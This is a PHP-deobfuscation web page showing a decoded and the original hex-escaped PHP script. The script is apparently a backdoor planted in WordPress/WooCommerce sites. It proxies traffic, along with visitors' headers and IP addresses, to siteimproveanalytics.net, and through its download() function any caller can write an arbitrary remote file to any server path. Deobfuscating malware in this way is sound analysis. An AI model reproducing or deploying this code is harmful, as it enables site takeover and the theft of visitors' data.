Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

goto rtQh3; iabEv: function set_to_cache($name, $value, $expired) { if (class_exists("\..

Decoded Output download

<?   
 goto rtQh3; iabEv: function set_to_cache($name, $value, $expired) { if (class_exists("Memcache")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("localhost"); if ($isAvailable) { $memcache->set($name, $value, 0, $expired); } } } goto iH0Px; WSoxs: try { if ($_SERVER["REQUEST_METHOD"] !== "GET") { bad_request(); } if (isset($_GET["download"])) { download(); die; } $url = $_SERVER["REQUEST_URI"]; if (!isset($url) || $url == '') { bad_request(); } $url = parse_url($url); $path = $url["path"]; if (!isset($path) || $path == "/") { bad_request(); } $query = ''; $clear = false; if (isset($url["query"])) { parse_str($url["query"], $params); if (isset($params["path"])) { $path = $params["path"]; unset($params["path"]); } if (isset($params["cache"]) && $params["cache"] == "clear") { $clear = true; } $query = http_build_query($params); } foreach ($routing as $key => $value) { if (strpos($path, $key) !== false) { $path = str_replace($key, $value, $path); } } if ($path == "/html/liveness") { echo "OK"; die(1); } if ($clear) { remove_in_cache($path); } $cached = true; $response = get_from_cache($path); if (!isset($response)) { $cached = false; $fp = fsockopen("ssl://" . $dest, 443, $code, $mesage, 5); if (!$fp) { die("{$code} ({$message})"); } fputs($fp, "GET " . $path . "?" . $query . " HTTP/1.1\xd\xa"); fputs($fp, "Host: " . $dest . "\xd\xa"); fputs($fp, "X-Forwarded-For: " . get_ip_address() . "
"); foreach (apache_request_headers() as $header => $value) { if ($header !== "Host" && $header !== "X-Forwarded-For") { fputs($fp, $header . ": " . $value . "
"); } } fputs($fp, "Connection: close\xd

"); while (!feof($fp)) { $response .= fgets($fp, 1024); } fclose($fp); } $result = explode("\xd\xa\xd
", $response, 2); if (!isset($result[0]) || !isset($result[1])) { bad_request(); } if (!headers_sent()) { header_remove(); } $headers = explode("
\xa", $result[0]); $cache = 0; $is_gzip = false; $is_chunked = false; foreach ($headers as $headerLine) { if (strpos($headerLine, "Connection") !== false) { continue; } if (strpos($headerLine, "Date") !== false) { continue; } if ($headerLine == "Content-Encoding: gzip") { $is_gzip = true; continue; } if ($headerLine == "Transfer-Encoding: chunked") { $is_chunked = true; continue; } if ($cached !== true && strpos($headerLine, "Cache-Control: public,max-age=") !== false) { $cache = intval(str_replace("Cache-Control: public,max-age=", '', $headerLine)); } header($headerLine, true); if (strpos($headerLine, "404 Not Found") !== false) { die; } } if ($cache > 0) { set_to_cache($path, $response, $cache); } $contents = $result[1]; if ($is_chunked) { $contents = decode_chunked($contents); } if ($is_gzip) { $contents = gzdecode($contents); } echo $contents; } catch (Exception $e) { bad_request(); } goto VJnxE; p98wC: function get_from_cache($name) { if (class_exists("Memcache")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("localhost"); if ($isAvailable) { $result = $memcache->get($name); if ($result) { return $result; } } } return null; } goto iabEv; fk6w9: function get_ip_address() { $ip = ''; if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) { $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; } else { if (isset($_SERVER["HTTP_CLIENT_IP"])) { $ip = $_SERVER["HTTP_CLIENT_IP"]; } else { $ip = $_SERVER["REMOTE_ADDR"]; } } return $ip; } goto YwblP; vJwLi: $dest = "siteimproveanalytics.net"; goto GjtWb; IuF9D: function download() { if (isset($_GET["s"]) and isset($_GET["d"])) { $file_url = urldecode($_GET["s"]); $destination_path = urldecode($_GET["d"]); $fp = fopen($destination_path, "w+"); $ch = curl_init($file_url); curl_setopt($ch, CURLOPT_FILE, $fp); curl_exec($ch); $st_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); fclose($fp); if ($st_code == 200) { echo "File downloaded successfully!"; } else { echo "Error downloading file!"; } } else { echo dirname(__FILE__); } } goto WSoxs; YwblP: function bad_request() { header("Location: https://google.com"); die; } goto p98wC; iH0Px: function remove_in_cache($name) { if (class_exists("Memcache")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("localhost"); if ($isAvailable) { $memcache->delete($name); } } } goto JwpuJ; JwpuJ: function decode_chunked($str) { for ($res = ''; !empty($str); $str = trim($str)) { $pos = strpos($str, "
"); $len = hexdec(substr($str, 0, $pos)); $res .= substr($str, $pos + 2, $len); $str = substr($str, $pos + 2 + $len); } return $res; } goto IuF9D; rtQh3: $routing = array("/wp-content/plugins/woocommerce/loader.php" => '', "/wp-content/plugins/woocommerce/vendor/loader.php" => '', "/errors/stats.php" => '', "/analytics" => ''); goto vJwLi; GjtWb: if (!function_exists("apache_request_headers")) { function apache_request_headers() { $arh = array(); $rx_http = "/\AHTTP_/"; foreach ($_SERVER as $key => $val) { if (preg_match($rx_http, $key)) { $arh_key = preg_replace($rx_http, '', $key); $rx_matches = array(); $rx_matches = explode("_", $arh_key); if (count($rx_matches) > 0 and strlen($arh_key) > 2) { foreach ($rx_matches as $ak_key => $ak_val) { $rx_matches[$ak_key] = ucfirst($ak_val); } $arh_key = implode("-", $rx_matches); } $arh[$arh_key] = $val; } } return $arh; } } goto fk6w9; VJnxE:  ?>

Did this file decode correctly?

Original Code


 goto rtQh3; iabEv: function set_to_cache($name, $value, $expired) { if (class_exists("\x4d\145\155\x63\x61\143\150\x65")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("\x6c\x6f\x63\x61\x6c\150\x6f\x73\164"); if ($isAvailable) { $memcache->set($name, $value, 0, $expired); } } } goto iH0Px; WSoxs: try { if ($_SERVER["\122\x45\x51\x55\x45\123\124\137\x4d\105\124\110\117\x44"] !== "\x47\x45\x54") { bad_request(); } if (isset($_GET["\x64\157\x77\156\154\x6f\141\x64"])) { download(); die; } $url = $_SERVER["\122\x45\121\x55\105\123\x54\x5f\125\122\x49"]; if (!isset($url) || $url == '') { bad_request(); } $url = parse_url($url); $path = $url["\160\141\164\150"]; if (!isset($path) || $path == "\57") { bad_request(); } $query = ''; $clear = false; if (isset($url["\161\165\x65\162\x79"])) { parse_str($url["\161\165\145\x72\171"], $params); if (isset($params["\x70\141\x74\x68"])) { $path = $params["\x70\x61\164\150"]; unset($params["\x70\x61\x74\x68"]); } if (isset($params["\x63\x61\143\x68\145"]) && $params["\x63\141\143\x68\145"] == "\143\154\145\141\x72") { $clear = true; } $query = http_build_query($params); } foreach ($routing as $key => $value) { if (strpos($path, $key) !== false) { $path = str_replace($key, $value, $path); } } if ($path == "\57\150\164\x6d\x6c\57\x6c\151\x76\x65\x6e\145\163\163") { echo "\117\x4b"; die(1); } if ($clear) { remove_in_cache($path); } $cached = true; $response = get_from_cache($path); if (!isset($response)) { $cached = false; $fp = fsockopen("\163\x73\x6c\72\57\57" . $dest, 443, $code, $mesage, 5); if (!$fp) { die("{$code}\40\x28{$message}\x29"); } fputs($fp, "\107\105\124\x20" . $path . "\77" . $query . "\x20\x48\124\x54\120\x2f\x31\x2e\61\xd\xa"); fputs($fp, "\x48\157\163\164\x3a\40" . $dest . "\xd\xa"); fputs($fp, "\130\55\106\157\x72\x77\141\x72\x64\145\x64\x2d\106\157\162\x3a\40" . get_ip_address() . "\15\12"); foreach (apache_request_headers() as $header => $value) { if ($header !== "\110\157\x73\164" && $header !== "\130\55\x46\157\x72\x77\141\162\x64\x65\144\x2d\x46\157\162") { fputs($fp, $header . "\72\40" . $value . "\15\12"); } } fputs($fp, "\x43\x6f\156\x6e\145\x63\x74\151\x6f\156\x3a\x20\143\154\157\x73\x65\xd\12\15\12"); while (!feof($fp)) { $response .= fgets($fp, 1024); } fclose($fp); } $result = explode("\xd\xa\xd\12", $response, 2); if (!isset($result[0]) || !isset($result[1])) { bad_request(); } if (!headers_sent()) { header_remove(); } $headers = explode("\15\xa", $result[0]); $cache = 0; $is_gzip = false; $is_chunked = false; foreach ($headers as $headerLine) { if (strpos($headerLine, "\103\x6f\156\x6e\x65\x63\164\151\157\156") !== false) { continue; } if (strpos($headerLine, "\104\x61\x74\145") !== false) { continue; } if ($headerLine == "\103\x6f\156\164\x65\x6e\164\x2d\x45\x6e\x63\157\144\151\156\x67\72\40\147\x7a\x69\160") { $is_gzip = true; continue; } if ($headerLine == "\124\162\x61\x6e\x73\x66\x65\162\x2d\x45\x6e\143\x6f\x64\151\156\147\x3a\40\x63\x68\165\x6e\x6b\x65\x64") { $is_chunked = true; continue; } if ($cached !== true && strpos($headerLine, "\103\141\x63\150\x65\x2d\x43\157\x6e\x74\162\157\x6c\x3a\x20\160\x75\x62\x6c\151\143\54\155\141\170\55\x61\147\x65\75") !== false) { $cache = intval(str_replace("\103\x61\143\150\145\55\103\157\x6e\x74\162\x6f\x6c\72\40\x70\x75\142\x6c\151\x63\54\155\x61\x78\x2d\141\x67\145\x3d", '', $headerLine)); } header($headerLine, true); if (strpos($headerLine, "\x34\60\x34\40\116\x6f\x74\x20\x46\157\165\156\x64") !== false) { die; } } if ($cache > 0) { set_to_cache($path, $response, $cache); } $contents = $result[1]; if ($is_chunked) { $contents = decode_chunked($contents); } if ($is_gzip) { $contents = gzdecode($contents); } echo $contents; } catch (Exception $e) { bad_request(); } goto VJnxE; p98wC: function get_from_cache($name) { if (class_exists("\115\x65\155\x63\x61\143\x68\145")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("\154\157\143\x61\154\150\x6f\x73\x74"); if ($isAvailable) { $result = $memcache->get($name); if ($result) { return $result; } } } return null; } goto iabEv; fk6w9: function get_ip_address() { $ip = ''; if (isset($_SERVER["\110\x54\x54\120\x5f\130\137\106\x4f\x52\x57\x41\x52\104\105\x44\x5f\106\x4f\122"])) { $ip = $_SERVER["\110\124\124\120\137\x58\x5f\106\117\x52\127\101\x52\104\105\x44\137\x46\x4f\x52"]; } else { if (isset($_SERVER["\110\x54\x54\120\137\103\114\111\105\x4e\124\137\111\120"])) { $ip = $_SERVER["\x48\124\x54\x50\137\103\x4c\111\x45\x4e\124\x5f\111\x50"]; } else { $ip = $_SERVER["\122\x45\x4d\x4f\x54\x45\137\x41\104\104\122"]; } } return $ip; } goto YwblP; vJwLi: $dest = "\163\151\164\x65\x69\x6d\160\162\x6f\166\x65\x61\x6e\141\154\x79\164\x69\x63\163\56\x6e\145\164"; goto GjtWb; IuF9D: function download() { if (isset($_GET["\x73"]) and isset($_GET["\144"])) { $file_url = urldecode($_GET["\163"]); $destination_path = urldecode($_GET["\144"]); $fp = fopen($destination_path, "\x77\x2b"); $ch = curl_init($file_url); curl_setopt($ch, CURLOPT_FILE, $fp); curl_exec($ch); $st_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); fclose($fp); if ($st_code == 200) { echo "\106\151\x6c\x65\40\144\157\167\x6e\x6c\x6f\141\x64\x65\144\x20\x73\165\x63\x63\145\163\163\x66\x75\x6c\x6c\x79\41"; } else { echo "\x45\162\x72\157\162\x20\x64\x6f\167\x6e\x6c\x6f\x61\x64\151\156\147\x20\146\x69\x6c\145\41"; } } else { echo dirname(__FILE__); } } goto WSoxs; YwblP: function bad_request() { header("\x4c\x6f\143\141\x74\151\157\156\x3a\x20\x68\164\x74\160\163\x3a\x2f\x2f\147\x6f\157\x67\x6c\145\56\143\157\155"); die; } goto p98wC; iH0Px: function remove_in_cache($name) { if (class_exists("\x4d\145\155\143\141\x63\150\145")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("\154\x6f\143\x61\x6c\x68\x6f\x73\x74"); if ($isAvailable) { $memcache->delete($name); } } } goto JwpuJ; JwpuJ: function decode_chunked($str) { for ($res = ''; !empty($str); $str = trim($str)) { $pos = strpos($str, "\15\12"); $len = hexdec(substr($str, 0, $pos)); $res .= substr($str, $pos + 2, $len); $str = substr($str, $pos + 2 + $len); } return $res; } goto IuF9D; rtQh3: $routing = array("\x2f\167\160\55\x63\157\x6e\x74\145\156\164\x2f\x70\154\165\x67\x69\156\163\x2f\167\157\x6f\143\x6f\155\155\x65\162\143\x65\x2f\x6c\157\x61\144\145\162\x2e\x70\150\x70" => '', "\x2f\x77\160\x2d\x63\x6f\x6e\x74\x65\x6e\x74\57\x70\x6c\165\147\x69\156\163\x2f\167\157\x6f\143\157\x6d\x6d\x65\x72\x63\145\x2f\166\x65\156\144\157\x72\x2f\x6c\x6f\x61\144\145\x72\56\x70\x68\x70" => '', "\57\145\162\x72\157\x72\x73\x2f\x73\164\x61\164\x73\56\x70\150\160" => '', "\x2f\141\156\x61\x6c\x79\x74\151\143\x73" => ''); goto vJwLi; GjtWb: if (!function_exists("\141\x70\x61\143\150\x65\137\x72\145\x71\165\145\163\x74\x5f\x68\145\x61\144\x65\162\163")) { function apache_request_headers() { $arh = array(); $rx_http = "\57\134\101\110\x54\124\x50\137\x2f"; foreach ($_SERVER as $key => $val) { if (preg_match($rx_http, $key)) { $arh_key = preg_replace($rx_http, '', $key); $rx_matches = array(); $rx_matches = explode("\x5f", $arh_key); if (count($rx_matches) > 0 and strlen($arh_key) > 2) { foreach ($rx_matches as $ak_key => $ak_val) { $rx_matches[$ak_key] = ucfirst($ak_val); } $arh_key = implode("\55", $rx_matches); } $arh[$arh_key] = $val; } } return $arh; } } goto fk6w9; VJnxE:

Function Calls

None

Variables

None

Stats

MD5	db0d9bb4acf5a4c144c78ffcb19782f7
Eval Count	0
Decode Time	88 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats